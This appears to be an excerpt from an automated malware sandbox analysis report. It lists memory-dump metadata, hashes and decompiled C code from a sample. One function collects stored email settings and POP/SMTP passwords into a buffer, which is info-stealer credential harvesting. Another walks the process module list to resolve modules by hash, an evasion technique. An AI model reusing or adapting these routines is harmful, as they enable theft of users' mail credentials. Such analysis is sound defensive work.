                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                    • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                    • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                    • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 0040D069, Relevance: 12.6, Strings: 10, Instructions: 138COMMON
                    Download Yara Rule
                    C-Code - Quality: 88%
                    			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74);
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}





















                    0x0040d070
                    0x0040d080
                    0x0040d084
                    0x0040d086
                    0x0040d08c
                    0x0040d0a0
                    0x0040d0ae
                    0x0040d0bd
                    0x0040d0c0
                    0x0040d0c5
                    0x0040d0c9
                    0x0040d0e3
                    0x0040d0f2
                    0x0040d101
                    0x0040d104
                    0x0040d109
                    0x0040d110
                    0x0040d11e
                    0x0040d123
                    0x0040d126
                    0x0040d12d
                    0x0040d145
                    0x0040d154
                    0x0040d15a
                    0x0040d166
                    0x0040d174
                    0x0040d186
                    0x0040d18e
                    0x0040d19a
                    0x0040d1ac
                    0x0040d1ba
                    0x0040d1cc
                    0x0040d1d1
                    0x0040d1dd
                    0x0040d1e2
                    0x0040d1e7
                    0x0040d1e7
                    0x0040d1e7
                    0x0040d1eb
                    0x0040d1f1
                    0x0040d1f7
                    0x0040d1ff
                    0x0040d207
                    0x0040d20f
                    0x0040d217
                    0x0040d21f
                    0x0040d227
                    0x0040d230

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.544901710.00000000004A0000.00000040.00000001.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                    • API String ID: 0-2111798378
                    • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                    • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                    • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                    • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040317B, Relevance: .0, Instructions: 46COMMON
                    Download Yara Rule
                    C-Code - Quality: 90%
                    			E0040317B(intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				void* __ecx;
				intOrPtr _t17;
				void* _t21;
				intOrPtr* _t23;
				void* _t26;
				void* _t28;
				intOrPtr* _t31;
				void* _t33;
				signed int _t34;

				_push(_t25);
				_t1 =  &_v8;
				 *_t1 = _v8 & 0x00000000;
				_t34 =  *_t1;
				_v8 =  *[fs:0x30];
				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
				_t31 = _t23;
				do {
					_v12 =  *((intOrPtr*)(_t31 + 0x18));
					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
					_pop(_t26);
					_t35 = _t28;
					if(_t28 == 0) {
						goto L3;
					} else {
						E004032EA(_t35, _t28, 0);
						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
						_t33 = _t33 + 0x14;
						if(_a4 == _t21) {
							_t17 = _v12;
						} else {
							goto L3;
						}
					}
					L5:
					return _t17;
					L3:
					_t31 =  *_t31;
				} while (_t23 != _t31);
				_t17 = 0;
				goto L5;
			}














                    0x0040317f
                    0x00403180
                    0x00403180
                    0x00403180
                    0x0040318d
                    0x00403196
                    0x00403199
                    0x0040319b
                    0x004031a1
                    0x004031a9
                    0x004031ab
                    0x004031ac
                    0x004031ae
                    0x00000000
                    0x004031b0
                    0x004031b3
                    0x004031c2
                    0x004031c7
                    0x004031cd
                    0x004031e0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004031cd
                    0x004031d7
                    0x004031dd
                    0x004031cf
                    0x004031cf
                    0x004031d1
                    0x004031d5
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.544901710.00000000004A0000.00000040.00000001.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                    • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                    • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                    • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040434D, Relevance: 15.1, APIs: 10, Instructions: 135comCOMMON
                    Download Yara Rule
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 0040438F
                    • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                    • #8.OLEAUT32(?), ref: 004043C4
                    • #2.OLEAUT32(?), ref: 004043CD
                    • #8.OLEAUT32(?,?,?,?,?), ref: 00404414
                    • #2.OLEAUT32(?,?,?,?,?), ref: 00404419
                    • #8.OLEAUT32(?,?,?,?,?), ref: 00404431
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: CreateInitializeInstance
                    • String ID:
                    • API String ID: 3519745914-0
                    • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                    • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                    • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                    • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                    Uniqueness

                    Uniqueness Score: -1.00%